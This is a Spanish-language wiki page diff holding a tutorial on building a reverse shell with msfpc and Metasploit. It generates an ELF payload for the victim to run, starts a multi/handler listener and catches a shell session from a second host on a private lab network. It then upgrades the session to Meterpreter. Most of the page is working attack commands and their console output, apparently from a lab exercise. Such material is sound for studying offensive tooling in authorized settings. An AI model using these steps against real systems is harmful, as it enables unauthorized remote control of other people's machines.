Differences

This shows you the differences between two versions of the page.

--- reverse_shell_with_metaexploit [2018/06/13 21:03] – jorpilo
+++ reverse_shell_with_metaexploit [2018/08/30 04:07] (current) – jorpilo
@@ Line 1: / Line 1: @@
 ====== Reverse shell with metaexploit ======
+Jorge Pinilla López
+/06/13
 Vamos a crear un reverse shell y a usarlo mediante un payload, metaexploit y meterpreter
@@ Line 6: / Line 10: @@
 Opciones por defecto:
-*Port 443
+  *Port 443
-*MSF
+  *MSF
-*REVERSE
+  *REVERSE
-*STAGELESS
+  *STAGELESS
-*TCP
+  *TCP
 Ejemplo de uso:
 <code>
@@ Line 39: / Line 43: @@
 Posibles payloads a generar:
+  *APK
+  *ASP
+  *ASPX
+  *Bash [.sh]
+  *Java [.jsp]
+  *Linux [.elf]
+  *OSX [.macho]
+  *Perl [.pl]
+  *PHP
+  *Powershell [.ps1]
+  *Python [.py]
+  *Tomcat [.war]
+  *Windows [.exe /.dll]
 Esto genera dos archivos:
-*linux-shell-staged-reverse-tcp-443.elf
+  *linux-shell-staged-reverse-tcp-443.elf
 Archivo que el atacado debe ejecutar
-*linux-shell-staged-reverse-tcp-443-elf.rc
+  *linux-shell-staged-reverse-tcp-443-elf.rc
 Payload para multi/handler de metaexploit
@@ Line 63: / Line 79: @@
 sudo msfconsole -q -r '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
 </code>
+===== Creación del handler =====
+Usando el codigo que genra msfpc
+<code>
+bash$> sudo msfconsole -q -r '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
+[*] Processing /home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc for ERB directives.
+resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> use exploit/multi/handler
+resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set PAYLOAD linux/x86/shell/reverse_tcp
+PAYLOAD => linux/x86/shell/reverse_tcp
+resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set LHOST 192.168.200.10
+LHOST => 192.168.200.10
+resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set LPORT 443
+LPORT => 443
+resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set ExitOnSession false
+ExitOnSession => false
+resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> run -j
+[*] Exploit running as background job 0.
+[*] Started reverse TCP handler on 192.168.200.10:443
+</code>
+Esto configura el handler y lanza el trabajo en background 0
+<code>
+msf exploit(multi/handler) > threads
+Background Threads
+==================
+   ID  Status  Critical  Name                             Started
+   --  ------  --------  ----                             -------
+   sleep   False     JobID(0)-Exploit: multi/handler  2018-06-13 23:05:25 +0200
+   sleep   True      SessionScheduler-1               2018-06-13 23:05:25 +0200
+   sleep   True      SessionScheduler-2               2018-06-13 23:05:25 +0200
+   sleep   True      SessionScheduler-3               2018-06-13 23:05:25 +0200
+   sleep   True      SessionScheduler-4               2018-06-13 23:05:25 +0200
+   sleep   True      SessionScheduler-5               2018-06-13 23:05:25 +0200
+   sleep   True      SessionManager                   2018-06-13 23:05:25 +0200
+   sleep   False     ReverseTcpHandlerListener-443    2018-06-13 23:05:25 +0200
+   sleep   False     ReverseTcpHandlerWorker-443      2018-06-13 23:05:25 +0200
+</code>
+Cuando el atacado abre el archivo genera una nueva sesion en metaexploit, para mostrar las sesiones:
+<code>
+msf exploit(multi/handler) >
+[*] Sending stage (36 bytes) to 192.168.200.164
+[*] Command shell session 1 opened (192.168.200.10:443 -> 192.168.200.164:42480) at 2018-06-13 23:08:29 +0200
+msf exploit(multi/handler) > sessions -l
+Active sessions
+===============
+  Id  Name  Type             Information  Connection
+  --  ----  ----             -----------  ----------
+         shell x86/linux               192.168.200.10:443 -> 192.168.200.164:42480 (192.168.200.164)
+</code>
+Como podemo ver es una sesión de linux shell, para acceder a la sessión ejecutamos
+<code>
+msf exploit(multi/handler) > sessions -i 1
+</code>
+y tendremos un shell en la maquina atacada.
+===== Meterpreter =====
+Vamos a ir un paso más y vamos a transformar dicha sesión de shell en una sesión de meterpreter, para ello:
+<code>
+msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
+msf post(multi/manage/shell_to_meterpreter) > set SESSION 1
+SESSION => 1
+msf post(multi/manage/shell_to_meterpreter) > run
+[*] Upgrading session ID: 1
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 192.168.200.10:4433
+[*] Sending stage (853256 bytes) to 192.168.200.164
+[*] Meterpreter session 2 opened (192.168.200.10:4433 -> 192.168.200.164:60144) at 2018-06-13 23:12:34 +0200
+[*] Command stager progress: 100.00% (773/773 bytes)
+[*] Post module execution completed
+</code>
+Si ahora vamos a sessions observamos las dos sesiones, podemos acceder a la session 2 de meterpreter:
+<code>
+msf post(multi/manage/shell_to_meterpreter) > sessions -l
+Active sessions
+===============
+  Id  Name  Type                   Information                                                 Connection
+  --  ----  ----                   -----------                                                 ----------
+         shell x86/linux                                                                    192.168.200.10:443 -> 192.168.200.164:42480 (192.168.200.164)
+         meterpreter x86/linux  uid=1001, gid=1001, euid=1001, egid=1001 @ 192.168.200.164  192.168.200.10:4433 -> 192.168.200.164:60144 (192.168.200.164)
+msf post(multi/manage/shell_to_meterpreter) > sessions -i 2
+[*] Starting interaction with 2...
+meterpreter >
+</code>